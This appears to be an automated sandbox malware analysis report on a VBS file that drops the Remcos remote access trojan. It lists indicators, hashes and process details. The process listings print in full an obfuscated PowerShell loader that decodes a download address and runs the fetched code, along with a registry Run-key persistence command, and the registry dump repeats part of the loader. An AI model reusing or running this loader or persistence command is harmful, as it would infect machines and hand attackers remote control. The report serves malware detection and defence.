File name:

doc02122024782020031808174KR1802122024_po_doc_00000991KB.vbs

Full analysis: https://app.any.run/tasks/e798a4ef-0b1a-46ab-a5e7-0bbc66b23eb1
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: December 02, 2024, 14:29:40
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
rat
remcos
evasion
Indicators:
MIME: text/plain
File info: ASCII text, with CRLF line terminators
MD5:

3F1B162CDE8A052E2743F254AD97C590

SHA1:

8263313C9ED96A36A57D67DFB72FA9729A2E792B

SHA256:

06D4A6631CC392070DC01E7BC97E333BD61AF14ECF60BFC492E2A585F56DAA22

SSDEEP:

384:M5cVCJUAGNvubdgdgrBRUmngkIgjpFsQF9Oq1ymBRhdzsxPc0+:M5cXLNvuby2LUmngzgjpimOq1dQxA

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Connects to the CnC server

      • msiexec.exe (PID: 5544)

    • REMCOS has been detected (SURICATA)

      • msiexec.exe (PID: 5544)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • wscript.exe (PID: 4504)

    • Uses REG/REGEDIT.EXE to modify registry

      • cmd.exe (PID: 5684)

    • Starts CMD.EXE for commands execution

      • msiexec.exe (PID: 5544)

    • Connects to unusual port

      • msiexec.exe (PID: 5544)

    • Checks for external IP

      • msiexec.exe (PID: 5544)

    • Contacting a server suspected of hosting an CnC

      • msiexec.exe (PID: 5544)

  • INFO

    • Manual execution by a user

      • powershell.exe (PID: 4528)

    • The process uses the downloaded file

      • wscript.exe (PID: 4504)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
129
Monitored processes
10
Malicious processes
2
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe conhost.exe no specs powershell.exe no specs conhost.exe no specs #REMCOS msiexec.exe cmd.exe no specs conhost.exe no specs reg.exe no specs svchost.exe

Process information

PID
CMD
Path
Indicators
Parent process
1468REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"C:\Windows\SysWOW64\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\advapi32.dll
2192C:\WINDOWS\system32\svchost.exe -k NetworkService -p -s DnscacheC:\Windows\System32\svchost.exe
services.exe
User:
NETWORK SERVICE
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Host Process for Windows Services
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\svchost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\kernel.appcore.dll
2612\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4384\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4428"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
wscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4504"C:\WINDOWS\System32\WScript.exe" C:\Users\admin\Desktop\doc02122024782020031808174KR1802122024_po_doc_00000991KB.vbsC:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
4528"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH mme/Manic2P.odd0capp 1Reint0Gysel0Loxod1 Mana0Fossi1Mysti UdskeFlabyriBrudar UndueErektf sello efamxCockn/ Afsp1Jebat3Jeaab1k,ken.Klikk0';$Underklasse=Pickover ' ,ediUChurcST.aisE Tri R tr.l- abenaOle,ngexscuETmmern U lst';$Interassociate111=Pickover ' Sndeh Litet PynttErri p F.jlsResc.: Fdse/a ien/Rebu gGeninaTr,ubrInddeh rabaoLovovuIsengdMisopjAchenoUnscouUnfrarSilvemLaane.FandacAfreno forgmInti /surm KHldekeRedeby Tran1 Stor.GaspipJ,rrynprea,gGirin>TambuhOver.tplositHalshpForsisUnpar:Plura/Yvern/Flyveg TofraOplrirHldeshP rfuoEksp uSlgsudHe.erjInfluo KnapuKridtrBlaammKur uoSmertn EfteeRddel.Tak.dcFor,doSkrddmkenel/ DrifK eeshe Forlyme ap1Tsume.WitjapPedo nBaggrg';$Stred=Pickover ' Brnd>';$Tsningens229=Pickover 'OryssIMahzoEStrejX';$Kejsersnit235='Tragicly';$Pubbens='\Glacialtid.Ses';Semra (Pickover ' Stim$ GuesGDobbwlLe teOEl,ndBEdomia UnfrLUnben:Le svTPre tIElopelCultifO.dfoLCorsayuklogT,iplonDryssiGu dtnSmmo.gCostuEDdsdrrKerneS opde= Poli$P,side FormnCalumvIrrat:WangaaRetu,p,nkekpVul,aDHasseaSpeaktUdtola,ordv+bismu$ A buppopp UBedu bSubteBSpildECerylnHje ts');Semra (Pickover ' Elec$AdresGflyboLOmkomO MarrB RolaAMor ilAnt h:Hieroh DoppOParanmAnchooGavagnP,equUstrawcBefstL paedeWelteA micrrHeavy=Tr ke$OplgnIBimanN .ibet ummae Afsvr Varea N tisVi,ers ummeoVib aCUnquoI lectABoli.tNatalef.tes1Dingo1 anuk1 Cata. I dgsEmbarP SubdlIneliiPowniTMel n(Knoen$SagsaSskuretUdskrRNecroEBi.chDTrold)');Semra (Pickover $Nonemphatic);$Interassociate111=$Homonuclear[0];$ajlen=(Pickover 'Bi pe$BallaGTvineLMenn ODeltiBK okuA.mnitlDiplo:KleskRNonc ENesogKOs ilL vaasa lagtMBe rveBa.samDe okSOverrS Hic IGe,brg ntip1 Ddsb3Papis7vider=SynkrNOpe hECheekW,apan-SjaskoAandsbZonitJ tveEBlis,cNinictJordv NewfaS S eeyskovlSAlantTProbaESubstM.ljma.Certi$TinglKRede A co.nrHerboAAir hkSki stConusEKo.poRDiakrfOlit,asprinsPeripTProstechiffS');Semra ($ajlen);Semra (Pickover ' pol,$MutedRComprePuddekUnbrelSup aa A temBoghaeTehanm decksBentis Whe iFyri,gPrahu1 Meso3 L.mp7Terra.Maho,HReseceMetemaEncrid .obbeSyntar lassCe,eb[M tte$Bru tUKollanNons,dS.agse Be,vrJaquek akelStofpaSlutss ResesAutope Male]P.ehe=Ps ch$ TigeLUnp oeRel pgLaticeNatbogUdpinaMousedAur.se xocosOnoma1Antim4 ube9');$Consonantness=Pickover 'Misha$ HaanRDe,ome Res kBravel Par,aUndermBiproeResismcaus sBack s eedli OffigS rai1Doras3 Wa t7Udl n.HaglbD CarboDaggewSystenInkb lDambroSamk,aSlaugd ramFL.theiformulOv rseFe sk(Upass$Aflo.I skadnP ugutSp aeeBulldr eaca racs gudesSangsoC,mpicSval iPar.maPajamtfor veO.fic1,ngil1Pa ms1 Nonr,Spgel$HomeoSFirdoagtzplkAgramsTovr eDetrasHematp N geaPhlebrOverskBewite ,ilmtT les3Dagse4T lsv)';$Saksesparket34=$Tilflytningers;Semra (Pickover 'Un ns$ UdtaGFempelOutspOAdjudBBronzA,nstrl.itup: RelaPStroguFi.moRMeagevKonceE.lposyDesse=Potla(RenonTRedivENonmaSS lvstKaesk-Ge tip ,ockADecylt itwohHusbl Komme$u,eldsHj mlAProfekEn ersKen teRid.es StrepBim laEmaljRVowelkM lieEwe,nlTM ter3 defi4Ba,ta)');while (!$Purvey) {Semra (Pickover 'Pan l$nonp,gUnballMuld.o AfvrbcricoaSekunlKalci:oprinG.arageFo osnDdelinShilleIb remAutopl.ncatyEtym sNaturn uberi ChemnSkamfgUdkrae Pseun.insas Over= Re b$SkulpAC.nfefGreevtLaanevLineatHunchnPyramiTrumfnstyrvg KdebePhotor rekln.addee') ;Semra $Consonantness;Semra (Pickover 'ModulsEksisTTude a efutROutbrtSquir-Ro anSdinoplGnavpeduemoESubcepNr st Cov.4');Semra (Pickover 'Wigg $ EterGR synL BorgO P rlbBetr.ALymphLD.rze: AuguPSkjoluMi,ikRDiverVshi,teItineyFre m=Masse( tut t DiffE,axidS .nnettidde- juleP PoinA albot Ha rHSkole L el$Bygevs JubeAtitlekTurris MarsEB nziS alacp irgiaNellir S.uikMinuseVanddtPrate3unenj4Tandy)') ;Semra (Pickover ' gnin$ForklGOv,rel CommoUdmaabVdet.A rampl An p:E,pirbGryrkADopinACou tdGesjfEEpigoHIn eraOwsenVSurconVingeSparon=Frea $UnpergRemnflJo dsOSlam bKontraBeskrLMilio: KonvKbonnwuLyne nYer tsGastot omplMClinoA llusLreache GuerRFunktePremenAucheSPret,+ stic+ gamo%Smask$ Na lH U,grOjetmomT dspo SmitnGaudeU DelacSubcolCe leePredeA A,toR Inte.SleepcLykk,oAgterU St.nnPari.t') ;$Interassociate111=$Homonuclear[$Baadehavns]}$Onaner=289582;$Nedstreg=31752;Semra (Pickover 'Succe$UttergUnposlRegnsOMatteB NonsaPeturlLarge:DiuremmessiyBel sRForblIRat rC HypoaM,yers.ostb Athei=Trist T.rnigM nkseWil.ltproje-CroisCStudeO PastnplaniTSecsre omern HvesTAfslu Remin$remiss SkenaSwipeKBanegSAttenE OplysSkatePDisenAGrindRCyanuk DeflE Sak tSel k3zestf4');Semra (Pickover 'Co la$his og CabblCompaopathob OveraMidlal.ever:Hija IBrugemKalifmKun taHeternScenee ocianFi kec ElefeAnako1Dy ph3Arnab7,hara i.dis=Skrmt Slave[PuggaSRerumy T.ucsOveretGyneceReaktm Dipn. O,isCFox hoOdifenDejlivRi gkeFeltarItacit Tros]Dippe:Hemih: Cap F SocirT rryoforkym SyndBProscaDummesElekte abar6Renny4RecipSEffert.asrerartisi pisnapoqug Invo(.istr$OverbM s inyRoularDanneiAntiec BeniaA riesDelkr)');Semra (Pickover 'Anden$RanglgStranLSawhooQualiBBlaykaUnd.sLDefau:Pela TCyanirki,niFRefleNK.rociWishenWellhg,nflaEFjerpr LevnnNikkeETilpasPremu Unine=Vende Dicyc[Sk,ttSOscilY H peS S ovtScorieHal,bmComme.Tanket.nockESennex,emont.acho. DmtiEFermanE iasc EyedOSkrteDUfolkIUpstaNKostugSw nd]Blimp: akti:UngenAco.esSMilksCBedsoiGrav ID.eng. g utGM,sune IrlatLaxats,artnTorganRVedliI LserNF.agtg Spig(Salna$opslaIJa goMYd.rgMElendA CardNRimelEOverlNO ersC R spEBehan1Tilsy3Refin7Mikro)');Semra (Pickover 'Unad.$Led rGidri LAfs yO ontobPositAIro iLUdlad:MagerLAncese OutdVSk,lnIste ttUdloeyDever=Kterr$ Ele.tMa.herVeneyfDest NRhombI CandnMull GEdiyaeAtropRLilesN .hroEKvletsKomma.DynenSSowtbUCa,elb SpheS ,looTSpri.rNonaiIr kogNSammeGUnder(Efter$Nre dOBeskinBa kka FrasnLagopeFestrRUninf,Stjer$Ter anDischeGrnttD RumssAnettTcalycr untoEAf eaGKadmi)');Semra $Levity;"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
4724\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
5544"C:\WINDOWS\SysWOW64\msiexec.exe"C:\Windows\SysWOW64\msiexec.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Version:
5.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\windows\syswow64\msiexec.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
5684"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Strudsmavers" /t REG_EXPAND_SZ /d "%Barcelona% -windowstyle 1 $Nedtllingen=(gp -Path 'HKCU:\Software\Firmity\').Isbjergets;%Barcelona% ($Nedtllingen)"C:\Windows\SysWOW64\cmd.exemsiexec.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\combase.dll
Total events
17 289
Read events
17 280
Write events
9
Delete events
0

Modification events

(PID) Process:(5544) msiexec.exeKey:HKEY_CURRENT_USER\SOFTWARE\Firmity
Operation:writeName:Isbjergets
Value:
;$Upbuild='Termometrisk';;$Litteraer='ridtenes';;$Huggedes='Boghvedegrynet';;$Eliger='Idolastre';;$Warps=$host.Name;function Pickover($Receded){If ($Warps) {$Uddelegeringernes=5} for ($Stuearrester=$Uddelegeringernes;;$Stuearrester+=6){if(!$Receded[$Stuearrester]) { break };$melitas+=$Receded[$Stuearrester];$Fordum='Philatelists'}$melitas}function Semra($clamatory){ .($Tsningens229) ($clamatory)}$Karakterfastes=Pickover ' Sko.N tus EUdko,T.lzev.Bi lew';$Karakterfastes+=Pickover 'Sor iEShellBfeje CCyprilUnderi moneeInqu.n DasyT';$Legegades149=Pickover 'Etat MIronboIldrazverdeiUnl,clMemenlDemera orte/';$opgavesamlingens=Pickover 'RefleTGrainlunders Di l1Overs2';$Nonemphatic='Shedm[Cumarn itulEOpma.tBasid. TranSE hjoePaaterNur avcop aiUnmanC SelveFran,PAyudaO ,njeImartiNForret SpalmUnadma R neN Ove AElfmugSa meeFo,riRMu.ro] aars:Inqui:UddelS SyslESkid,CHaid.UEuropRNagaii VandTOpdraYPrevePCadweRHemopo Fa.kTSiphoO etacResulo F.rlLLands=Klima$Chec.OJazzbpUnfouGMallaADavidVStoreeLiqu SFjerdAAmb.sMHandlLbrobaiPouldn Ex eg,mbroeSub.eNLoss S';$Legegades149+=Pickover 'Kajpl5 P.ac.ant n0Erhve tr he( esoWoversiHok,un Forud ,ospoWienewOverfsKomm, UvuloN KalcTLdrep Spach1Unp e0Indta. Eiri0ha,rd;Thal EpaulW ForbiUnicanni,ku6 Timg4Alamo;Stili ActinxHypoc6 Thor4Nazar;Mouto SchmarunthwvExpat:trill1terpe3ur em1Spots.Optag0Ana r)Repre omiG Em ee A ktcSnapskH gumoH 